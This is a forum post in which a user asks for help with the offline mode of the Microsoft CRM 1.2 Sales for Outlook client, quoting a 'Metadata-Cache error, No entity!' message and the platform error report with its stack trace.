Thank so much for your help!
- 15
- Crm >> CRM Sales for Outlook 1.2Hi!
We are using mscrm 1.2 successfully for a while now (no
mail router, no outlook client). Now we tried to
integrate it into our exchange environment using the
outlook client. Online is working fine but the offline
functionality isn't working. Obviously the local msde-
database is not getting any data.
The error message is: "Metadata-Cache error, No entity!"
The log says:
MSCRM Platform Error Report:
----------------------------------------------------------
----------------------------------------------
Error: Exception from HRESULT: 0x80040E00.
Error Message: Exception from HRESULT: 0x80040E00.
Error Details: Details on this error have not been
provided by the platform.
Source File: Not available
Line Number: Not available
Stack Trace Info: at System.Web.UI.Page.HandleError
(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext
context)
at
System.Web.CallHandlerExecutionStep.System.Web.HttpApplica
tion+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep
(IExecutionStep step, Boolean& completedSynchronously)
Has anyone any idea to get the client working?
Thank you very much!
Chris
|
|
|